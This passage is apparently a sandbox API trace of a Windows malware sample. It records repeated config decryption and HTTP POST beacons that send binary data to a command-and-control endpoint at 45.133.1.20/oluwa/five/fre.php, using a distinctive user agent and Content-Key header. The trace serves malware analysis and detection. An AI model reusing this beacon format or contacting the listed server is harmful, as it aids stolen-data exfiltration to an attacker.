phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0274.831] GetProcessHeap () returned 0x6a0000 [0274.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0274.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.833] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0274.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.834] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.836] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.836] GetProcessHeap () returned 0x6a0000 [0274.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0274.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.837] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0274.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.839] CryptDestroyKey (hKey=0x6ad020) returned 1 [0274.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.840] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0274.840] GetProcessHeap () returned 0x6a0000 [0274.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0274.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.842] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0274.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.890] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0274.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.891] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0274.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.896] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0274.896] GetProcessHeap () returned 0x6a0000 [0274.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0274.897] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0274.897] GetProcessHeap () returned 0x6a0000 [0274.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0274.897] socket (af=2, type=1, protocol=6) returned 0x9cc [0274.897] connect (s=0x9cc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0274.922] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0274.922] GetProcessHeap () returned 0x6a0000 [0274.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0274.922] GetProcessHeap () returned 0x6a0000 [0274.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0274.923] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0274.924] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0274.924] GetProcessHeap () returned 0x6a0000 [0274.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9f30 [0274.924] GetProcessHeap () returned 0x6a0000 [0274.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0274.927] GetProcessHeap () returned 0x6a0000 [0274.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0274.927] GetProcessHeap () returned 0x6a0000 [0274.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0274.928] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0274.929] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0274.929] GetProcessHeap () returned 0x6a0000 [0274.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0274.929] GetProcessHeap () returned 0x6a0000 [0274.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0274.930] send (s=0x9cc, buf=0x6bd460*, len=242, flags=0) returned 242 [0274.930] send (s=0x9cc, buf=0x6bb998*, len=159, flags=0) returned 159 [0274.930] GetProcessHeap () returned 0x6a0000 [0274.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0274.931] recv (in: s=0x9cc, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0275.049] GetProcessHeap () returned 0x6a0000 [0275.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0275.049] GetProcessHeap () returned 0x6a0000 [0275.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0275.050] GetProcessHeap () returned 0x6a0000 [0275.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f30 | out: hHeap=0x6a0000) returned 1 [0275.050] GetProcessHeap () returned 0x6a0000 [0275.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0275.051] closesocket (s=0x9cc) returned 0 [0275.052] GetProcessHeap () returned 0x6a0000 [0275.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0275.052] GetProcessHeap () returned 0x6a0000 [0275.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0275.052] GetProcessHeap () returned 0x6a0000 [0275.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0275.053] GetProcessHeap () returned 0x6a0000 [0275.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0275.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1760) returned 0x9cc [0275.055] Sleep (dwMilliseconds=0xea60) [0275.057] GetProcessHeap () returned 0x6a0000 [0275.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0275.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.060] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.071] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0275.083] GetProcessHeap () returned 0x6a0000 [0275.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0275.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.084] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0275.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.086] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.087] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.087] GetProcessHeap () returned 0x6a0000 [0275.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0275.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.090] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0275.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.094] CryptDestroyKey (hKey=0x6ad560) returned 1 [0275.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.095] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0275.095] GetProcessHeap () returned 0x6a0000 [0275.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0275.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.096] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.097] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.098] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.101] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.104] GetProcessHeap () returned 0x6a0000 [0275.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0275.104] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.104] GetProcessHeap () returned 0x6a0000 [0275.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0275.105] GetProcessHeap () returned 0x6a0000 [0275.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0275.105] GetProcessHeap () returned 0x6a0000 [0275.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0275.106] GetProcessHeap () returned 0x6a0000 [0275.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0275.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.116] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0275.125] GetProcessHeap () returned 0x6a0000 [0275.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0275.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.126] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0275.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.127] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.128] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.236] GetProcessHeap () returned 0x6a0000 [0275.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0275.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.238] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0275.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.250] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0275.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.251] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0275.252] GetProcessHeap () returned 0x6a0000 [0275.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0275.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.253] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0275.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.254] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0275.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.259] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0275.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.260] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0275.260] GetProcessHeap () returned 0x6a0000 [0275.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0275.261] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0275.261] GetProcessHeap () returned 0x6a0000 [0275.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0275.261] socket (af=2, type=1, protocol=6) returned 0x9d0 [0275.262] connect (s=0x9d0, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0275.287] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0275.287] GetProcessHeap () returned 0x6a0000 [0275.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0275.287] GetProcessHeap () returned 0x6a0000 [0275.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0275.288] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0275.290] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0275.290] GetProcessHeap () returned 0x6a0000 [0275.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0275.290] GetProcessHeap () returned 0x6a0000 [0275.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0275.291] GetProcessHeap () returned 0x6a0000 [0275.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0275.291] GetProcessHeap () returned 0x6a0000 [0275.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0275.292] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0275.293] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0275.293] GetProcessHeap () returned 0x6a0000 [0275.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0275.293] GetProcessHeap () returned 0x6a0000 [0275.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0275.294] send (s=0x9d0, buf=0x6bd460*, len=242, flags=0) returned 242 [0275.294] send (s=0x9d0, buf=0x6bb998*, len=159, flags=0) returned 159 [0275.294] GetProcessHeap () returned 0x6a0000 [0275.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0275.294] recv (in: s=0x9d0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0275.367] GetProcessHeap () returned 0x6a0000 [0275.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0275.367] GetProcessHeap () returned 0x6a0000 [0275.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0275.367] GetProcessHeap () returned 0x6a0000 [0275.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0275.368] GetProcessHeap () returned 0x6a0000 [0275.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0275.369] closesocket (s=0x9d0) returned 0 [0275.370] GetProcessHeap () returned 0x6a0000 [0275.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0275.370] GetProcessHeap () returned 0x6a0000 [0275.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0275.370] GetProcessHeap () returned 0x6a0000 [0275.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0275.370] GetProcessHeap () returned 0x6a0000 [0275.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0275.384] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1764) returned 0x9d0 [0275.387] Sleep (dwMilliseconds=0xea60) [0275.389] GetProcessHeap () returned 0x6a0000 [0275.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0275.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0275.414] GetProcessHeap () returned 0x6a0000 [0275.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0275.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.416] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0275.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.426] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.432] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0275.432] GetProcessHeap () returned 0x6a0000 [0275.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0275.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.433] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0275.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.435] CryptDestroyKey (hKey=0x6ad060) returned 1 [0275.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.436] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0275.436] GetProcessHeap () returned 0x6a0000 [0275.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0275.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.438] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0275.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.439] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0275.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.441] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0275.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0275.442] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0275.442] GetProcessHeap () returned 0x6a0000 [0275.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0275.442] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0275.442] GetProcessHeap () returned 0x6a0000 [0275.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0275.443] GetProcessHeap () returned 0x6a0000 [0275.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0275.443] GetProcessHeap () returned 0x6a0000 [0275.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0275.444] GetProcessHeap () returned 0x6a0000 [0275.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0275.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.445] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0275.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.456] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0275.466] GetProcessHeap () returned 0x6a0000 [0275.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0275.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.468] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0275.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.469] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0275.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0275.470] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, 